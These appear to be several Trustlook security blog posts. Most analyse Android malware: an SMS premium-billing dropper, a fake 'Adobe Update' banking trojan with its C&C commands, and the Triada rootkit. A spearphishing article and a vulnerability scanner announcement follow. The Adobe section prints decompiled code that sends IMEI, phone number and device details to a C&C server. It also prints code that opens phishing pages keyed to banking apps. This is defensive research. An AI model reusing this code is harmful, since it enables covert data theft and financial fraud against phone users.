Analysis of com.zqb.skater and Dropper/SMS behaviors

 

— Trustlook Research Team

Package name: com.zqb.skater

md5: fbf041055829b571816af52761fcf23c

Chinese name: 我的滑板鞋

 

The app appears to be a normal game after installation. Users can buy virtual products in the game. However in the background, it will collect information like IMEI, device ID and SMS.

Screen Shot 2016-05-24 at 7.10.04 PM

It’s common that apps send premium SMS to a specific company. Users buy virtual products to play game more easily. But this app drops another app to send SMS without user interaction. Then, via aggregator and wireless provider, a message is sent to user to confirm the order. The app can block message and confirm the charge. In this way, user gets charged silently and the malware developer makes money.

Details:

  1. The app registers SMS read, receive and send permissions in AndroidManifest.xml.

  Screen Shot 2016-05-24 at 7.11.16 PM

It also registered broadcasting of receiving SMS and other intents with the highest priority.

Screen Shot 2016-05-24 at 7.13.57 PM

E.g, the SSLaunchReceiver below shows that the app has many privileges including receiving SMS.

Screen Shot 2016-05-24 at 7.16.01 PM

  1.   Then the app downloads a new apk which can send SMS and block the broadcast from being propagated. Then the app can receive and intercept the replying SMS.

Screen Shot 2016-05-24 at 7.17.15 PM

 

 

The apk will be saved at “/storage/emulated/0/Android/data/com.lyhtgh.pay/plugins/”. The name is com.lyhtgh.pay.ltplugin.apk.

The figures below show the logic to send and block SMS.

Send SMS:

Screen Shot 2016-05-24 at 7.18.16 PM

Receive and Block SMS:

Screen Shot 2016-05-24 at 7.19.19 PM

  1. As shown in the last figure, the app will receive a broadcast of “receive_revert_sms_action_internal” and then send a message to the host app.  When this broadcast is received, it handles the SMS which content is stored in a tmp file inside Android.

Screen Shot 2016-05-24 at 7.20.12 PM

 

 

Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have been permeating into every corner of the world. After years of rapid growth, their popularity and usefulness reaches that of personal computers. Besides calling and texting, it is becoming more popular for people to do daily banking on their smartphone. With the computing capability, some traditional malware are shifting into the world of smartphones. They compromise the smartphone, change the phone behavior, and receive instructions from the remote attacker to steal user’s information.

One of these examples is a newly discovered malicious app named “Adobe Update”, which has the package name “droid.invisible”. It is a phishing Trojan that targets the android platform.

The sample’s MD5 is : D8616CDD54154B06A5E4D9D5B2A605E5
The package icon is::

Picture1

In virustotal among 57 antivirus vendors, only 3 vendors detected them when initially submitted.

vt

The malware conceals its own developer certificate information behind a reputable enterprise :

malware_cert

 

Yet the official com.adobe.reader app in Google Play is of this correct developer certificate:

adobe_cert

Upon installation, this malware presents the user with a misleading setup dialog box while replacing the default SMS app:

sms

The app displays messages to entice user to grant the device admin to maintain the persistence on the system:

admin

The app cannot be uninstalled by the normal means:

uninstall

The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level

pcap

The following code snippets demonstrate the above behaviours:

 

classimplements Runnable

[…]

Thread.sleep(20000L);

Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] – SEND MOBILE DATA”);

a.a.a.a.a locala = new a.a.a.a.a();

x localx = new x();

TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService(“phone”);

localx.a(“id”, localTelephonyManager.getDeviceId());

localx.a(“country”, localTelephonyManager.getNetworkCountryIso());

localx.a(“opname”, localTelephonyManager.getNetworkOperatorName());

localx.a(“osversion”, System.getProperty(“os.version”) + “(” + Build.VERSION.INCREMENTAL + “)”);

localx.a(“osapilevel”, Build.VERSION.RELEASE + “(” + Build.VERSION.SDK_INT + “)”);

localx.a(“device”, Build.DEVICE);

localx.a(“model”, Build.MODEL + ” (” + Build.PRODUCT + “)”);

localx.a(“pnumber”, localTelephonyManager.getLine1Number());

localx.a(“botid”, “777”);

locala.a(“http://94.140.120.183/gate/receive.php”, localx, new b(this));

[…]

Furthermore, the malware receives command instructions from the C&C server to perform various functions:

  • loop  // wait for next command
  • sms  // send sms message
  • readsms  // retrieve sms message and send to the C&C server
  • ion // the function is not implemented, write to log file
  • ioff // same as above
  • recall // call received numbers.
  • fish // show an attacker controlled web page when a specific foreground running app is found.

The following code snippets demonstrate the malware checks for the received parameters and shows a phishing web page:

if (paramArrayOfByte[0].equals(“fish”)) // compare command name

{

Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] :: FISH”);

this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra(“data”, paramArrayOfByte[1]));

}

[…]

public class InjectionScanner extends Service

{

int a = 0;

String b;

public String a()

{

return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName; // get foreground running process name

}

public void a(String paramString)

{

paramString = new Thread(new g(this, paramString));

paramString.setDaemon(true);

paramString.start();

}

[…]

public class InjectionScanner extends Service

{

int a = 0;

String b;

public String a()

{

return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName;

}

[…]

public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)

{

this.b = paramIntent.getStringExtra(“data”);

a();

a(this.b);

return paramInt1;

[…]

(this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray(“apps”).getString(j))) // compare the foreground running app name with received string

{

Intent localIntent = new Intent(this.b, InjectionActivity.class);

localIntent.addFlags(268435456);

localIntent.putExtra(“injection”, localJSONObject.names().getString(i));

this.b.startActivity(localIntent);

this.b.a = 1;

[…]

@SuppressLint({“SetJavaScriptEnabled”})

protected void onCreate(Bundle paramBundle)

{

super.onCreate(paramBundle);

setContentView(2130968604);

paramBundle = (TelephonyManager)getSystemService(“phone”);

Intent localIntent = getIntent();

WebView localWebView = (WebView)findViewById(2131492971);

localWebView.getSettings().setJavaScriptEnabled(true);

localWebView.setWebViewClient(new f(this, null));

localWebView.setWebChromeClient(new e(this, null));

localWebView.loadUrl(“http://94.140.120.183/injections/?bank=” + localIntent.getStringExtra(“injection”) + “&imei=” + paramBundle.getDeviceId()); // show phishing web page

}

}

The malware displays phishing web page when a specific app is found, for example, the banking app. The fraudsters persuade gullible users to enter their financial details and harvest all the information.

The C&C server 94.140.120.183 is located in Latvia:

http://whois.domaintools.com/94.140.120.183

 

latvia

Spearphishing is on the Million Dollar Horizon

Hackers are getting more creative around the world. It only takes a split second for a hacker to infiltrate a server, a computer, or even a person’s personal information. The growing trend around the globe is hackers are bypassing traditional technology pathways of phishing and are headed to employees, untrained in the manipulative ways of hacking. Recently in the United States, an investing firm was a victim of spearphishing. The investing firm, located in Michigan, filed a report stating that an employee of theirs had accidently transferred approximately $500,000 into a Hong Kong bank. The employee had been emailed by someone posing as a company executive that asked for the money to be transferred. This staffer had found the email to be seemingly legitimate and fulfilled the request of transferring the money to an overseas account in a Hong Kong bank.

This isn’t the first or last time a company has been a victim of a security breach. With tax season having just come to a finish in the states, many hackers are seizing the opportunity. Tax forms hold sensitive and crucial information, especially W-2 forms. These forms hold personal data such as addresses, incomes, places of employment, social security numbers, and family information. Cybercriminals are able to use this information to falsify tax returns on their own behalves and harvest this information for later use.

Other scams are similar to the ones faced by larger companies, where the cybercriminal will simply go after employees and staffers. Posing as a company executive or a person’s manager, the hackers talk employees into transferring millions of dollars. Studies show there is a 67% increase in attacks across the world and 43% increase in fraudulent tax schemes occurring.

Cybercriminals are using sophisticated methods in order to sense out what kinds of attacks would be the most beneficial for them and the most damaging for corporations and every day citizens. Using intelligent software, a hacker is able to sense what weak points they can exploit and use this information to benefit themselves greatly. Whether it is a few bitcoins or millions of dollars, cybercriminals will do anything to gain the edge.

Trustlook’s New App Addresses Widespread Qualcomm Vulnerability

Trustlook is taking steps to combat a widespread vulnerability affecting millions of Android devices. First discovered by FireEye in March 2016, the vulnerability is present in all Android Jelly Bean, KitKat and Lollipop phones using Qualcomm CPUs. On these devices, third party apps could gain special system privileges, or access to a user’s SMS database and phone history, without a user’s knowledge.

To determine if a user device is vulnerable to this threat, Trustlook released a free Qualcomm Vulnerability Scanner application (available here) to enable any Android phone owner to check for this security threat. If the device is exposed, a user may be able to download a software update from the device manufacturer that contains a security patch.

A major concern is that for many devices, there may be no fix available because the device is no longer supported by the manufacturer with regular updates and security patches. The only foolproof way to eliminate the vulnerability is to get a new device or install a mobile security app on the phone.

Trustlook is working on providing additional protection against potential exploits of the Qualcomm vulnerability, particularly for devices that currently lack a security patch for the system software, in its core Trustlook Mobile Security application. Please stay tuned for updates on this. In the meantime, you are highly encouraged to download the Qualcomm Vulnerability Scanner to determine if your device is at risk.

Organized Crime using Rootkit – The analysis of the Triada malware

– Trustlook Research Team

Trustlook Research Team recently researched a complicated malware which utilizes Rootkit SDK to facilitate malicious behaviors.

MD5: 3B71DEBDE5F6A3E4D2E9321266DA76F7

Package name: fbkgofn.jpcebbe.mcdfpda.decjehi.kmnkgeg.kdgkohl

  1. The sample uses a popular root SDK (Root Genius, com.shuame.rootgenius.sdk) to root the user’s phone in order to get root privilege. It first checks if the phone has been rooted. If not, it will collect the phone’s device info (such as the Android version/SDK version/product ID and so on) and upload that information to the server to find the appropriate root exploit. It then downloads the root exploit to the phone, uncompresses it, and decrypts it for rooting.
  2. root_checkFig.1. Check if the phone has been rootedrg_root_param

    Fig.2. Collect the phone’s info for downloading the suitable root exploit from the server

  3. The sample uses the “com.android.essdk.eyou.b.b” SDK to deduct a fee from a user’s phone bill by sending an SMS to some high premium numbers. It also monitors the user’s SMS inbox and intercepts the reply SMS from the high premium numbers that notify the user the phone has just ordered some service, the filter keywords for interception are as follows: 10086/成功订购/和视频/和视界/1065/1066(some high premium number start with this num)

sms_inteceptFig.3. Intercept the confirmation SMS sent from the high premium numbers

SMS_interception_2Fig.4. Intercept the confirmation SMS containing some special keywords

  1. The sample uses some tricks to evade static detection, such as putting together a string by joining some chars dynamically. The malware puts together the string “SMS_RECEIVED” and “WAP_PUSH_RECEIVED” to evade the static detection of the anti-virus vendor.join_the_str_dynamicallyFig.5. Putting together the sensitive string by joining them dynamically
  2. The sample uses a filter to filter out the SMS that contains some keywords, these keywords are stored in a local Database located in /data/data/fbkgofn.jpcebbe.mcdfpda.decjehi.kmnkgeg.kdgkohl/databases/zhifu, the database’s name is zhifu, the table’s name is block.zhifu_dbFig.6. The database that storing the SMS filter keywords and the AD display setting

The database’s structure is as follows:

sms_block_filter_dbFig.7. The table information of the SMS filter sms_block_db_keysFig.8. All the keys of the SMS filter table